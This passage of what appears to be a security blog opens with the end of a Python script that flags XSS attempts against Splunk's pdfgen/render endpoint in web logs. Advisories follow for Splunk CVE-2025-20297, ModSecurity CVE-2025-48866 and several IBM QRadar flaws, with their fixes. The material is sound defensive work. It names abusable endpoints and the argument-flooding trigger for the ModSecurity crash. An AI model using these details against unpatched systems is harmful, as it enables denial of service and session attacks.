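    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_attempts(log_text):
    """One finding per pdfgen/render query parameter whose decoded value looks like script."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        url = urlsplit(entry["target"])
        if not url.path.rstrip("/").endswith("/pdfgen/render"):
            continue
        for param, raw in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(raw)
            if SUSPICIOUS.search(value):
                findings.append({"ip": entry["ip"], "user": entry["user"], "ts": entry["ts"],
                                 "status": entry["status"], "param": param, "value": value})
    return findings


if __name__ == "__main__":
    for hit in find_xss_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['user']}@{hit['ip']} status={hit['status']} "
              f"param={hit['param']} value={hit['value']!r}")
```

Note that a 400 response does not make an attempt harmless: the interesting question is which low-privileged accounts are generating these requests, which is why the finding keeps the user and source address rather than only the payload.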
CVE ID | System Affected | Vulnerability Details | Impact
CVE-2025-20297 | Splunk Enterprise and Splunk Cloud Platform, multiple versions | Low-privileged users can abuse the pdfgen/render endpoint to get unauthorized JavaScript executed in a victim's browser. | Reflected XSS (script execution in the victim's browser session)
Remediation:
Splunk has released updates, that addressed the vulnerability:
Splunk Enterprise: Upgrade to version 9.4.2, 9.3.4, 9.2.6, 9.1.9 or latest.
Splunk Cloud Platform: Upgrade to version 9.3.2411.102, 9.3.2408.111, 9.2.2406.118 or latest.
If you cannot upgrade immediately, you can disable Splunk Web to prevent exploitation. For this you can review the web.conf configuration file and follow the Splunk guidance on disabling unnecessary components.
Disabling Splunk Web may impact users who rely on the web interface so consider access controls or network-based restrictions as temporary mitigations.
Conclusion: While CVE-2025-20297 is rated medium severity, it should not be ignored in environments where many users interact with Splunk dashboards. Attackers with limited permissions could target higher-privileged users by sending them crafted links or payloads.
Organizations should prioritize upgrading Splunk to the fixed versions or implementing the workarounds immediately.
Even though this vulnerability requires some user interaction, the risks include unauthorized access to sensitive data through potential session hijacking.
While Splunk has not provided specific detection methods for this vulnerability, organizations should monitor access to the pdfgen/render endpoint and review user privilege assignments to minimize potential exposure.
For organizations that rely on Splunk for security monitoring and business intelligence, an attacker running script in an analyst's or administrator's session is a risk worth addressing promptly.
ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx.
OEM: ModSecurity
Severity: High
CVSS Score: 7.5
CVEs: CVE-2025-48866
CWEs: CWE-1050
Exploited in Wild: No
Advisory Version: 1.0
Overview
A Denial of Service (DoS) vulnerability has been identified in ModSecurity, an open-source web application firewall (WAF) used with Apache, Nginx and IIS.
The issue affects versions prior to 2.9.10 and relates to the “sanitiseArg” action, which can be abused by sending an excessive number of matching arguments, ultimately exhausting memory and crashing the process. The vulnerability has been fixed in version 2.9.10.
No user interaction is required to trigger it, and exploitation can lead to significant resource consumption and service disruption.
Vulnerability Name | CVE ID | Product Affected | Severity | Fixed Version
Denial of Service (DoS) vulnerability | CVE-2025-48866 | ModSecurity WAF | High | v2.9.10
Technical Summary
The vulnerability arises from the behavior of the “sanitiseArg” (also referred to as “sanitizeArg”) action in ModSecurity. This action sanitizes a specific argument passed to a rule (e.g.- password), masking it in the logs by replacing its value with asterisks (*).
CVE ID | System Affected | Vulnerability Details | Impact
CVE-2025-48866 | ModSecurity (mod_security 2.x) prior to v2.9.10 | When a rule uses the sanitiseArg action, ModSecurity processes every argument matching the given name (e.g., password). If a large number of matching arguments (500 or more) are sent, they are repeatedly added to memory, leading to excessive memory consumption and potentially a crash. | Service crash through resource exhaustion (DoS)
Remediation:
Apply Patches Promptly: Upgrade to ModSecurity version 2.9.10 or the latest one.
Avoid using the “sanitiseArg” action (or its alias “sanitizeArg”) in your rules. If no rule uses this action, the engine is not affected by the vulnerability.
Conclusion: This vulnerability, similar to the earlier CVE-2025-47947 issue (another resource-exhaustion flaw in ModSecurity 2.x argument sanitisation), presents a significant risk for organizations relying on ModSecurity 2.x for web application protection.
Although the vulnerability is rated high, it requires a specific configuration (a rule that uses sanitiseArg) to be exploitable. To ensure the continued stability and security of web applications, the fix should nevertheless be applied as soon as possible.
Multiple vulnerabilities have been discovered in IBM QRadar Suite Software and Cloud Pak, affecting versions 1.10.0.0 through 1.11.2.0.
The company released patches on June 3, 2025, addressing five distinct Common Vulnerabilities and Exposures (CVEs) that affect enterprise security infrastructure used by organizations worldwide.
These include risks such as remote code execution, information disclosure, session hijacking, and denial of service. The most critical vulnerability (CVE-2025-25022) allows unauthenticated access to sensitive configuration files. IBM has released version 1.11.3.0 to address these issues.
Vulnerability Name | CVE ID | Product Affected | CVSS Score | Severity
Information Disclosure Vulnerability | CVE-2025-25022 | IBM Cloud Pak, QRadar Suite | 9.6 | Critical
Code Execution Vulnerability | CVE-2025-25021 | IBM QRadar SIEM | 7.2 | High
Denial of Service Vulnerability | CVE-2025-25020 | IBM QRadar SIEM | 6.5 | Medium
Session Hijacking Vulnerability | CVE-2025-25019 | IBM QRadar SIEM | 4.8 | Medium
Web Cache Disclosure Vulnerability | CVE-2025-1334 | IBM QRadar Suite | 4.0 | Medium
Technical Summary
The identified vulnerabilities affect both the IBM QRadar Suite and Cloud Pak, exposing them to a variety of threats such as unauthorized access, arbitrary code execution, and denial of service.
These flaws arise from weaknesses in session handling, code generation, API validation, and file configuration security.
CVE ID | System Affected | Vulnerability Details | Impact
CVE-2025-25022 | QRadar SIEM | Unauthenticated access to sensitive configuration files due to inadequate protections. | Information disclosure, RCE
CVE-2025-25021 | QRadar SIEM | Privileged code execution due to improper script code generation in case management. | Remote Code Execution
CVE-2025-25020 | QRadar SIEM | API input validation flaw allowing a service crash via malformed data. | Denial of Service
CVE-2025-25019 | QRadar SIEM | Sessions not invalidated on logout, enabling impersonation by attackers. | Session Hijacking
CVE-2025-1334 | QRadar Suite | Cached web content readable by other users, compromising multi-user data confidentiality. | Local Information Disclosure
Remediation:
Apply Latest Fix: Upgrade to IBM QRadar Suite Software and Cloud Pak version 1.11.3.0 or later.
Refer to IBM’s official installation and upgrade documentation for detailed steps.
Conclusion: These vulnerabilities pose significant security risks, especially CVE-2025-25022 with a critical severity score of 9.6. Organizations using the affected IBM QRadar and Cloud Pak versions should prioritize upgrading to latest version to mitigate exposure.
IBM has acknowledged these issues and released patches to address all five vulnerabilities.
Notably, IBM has identified no effective workarounds or mitigations for these vulnerabilities, making patching the only viable protection strategy.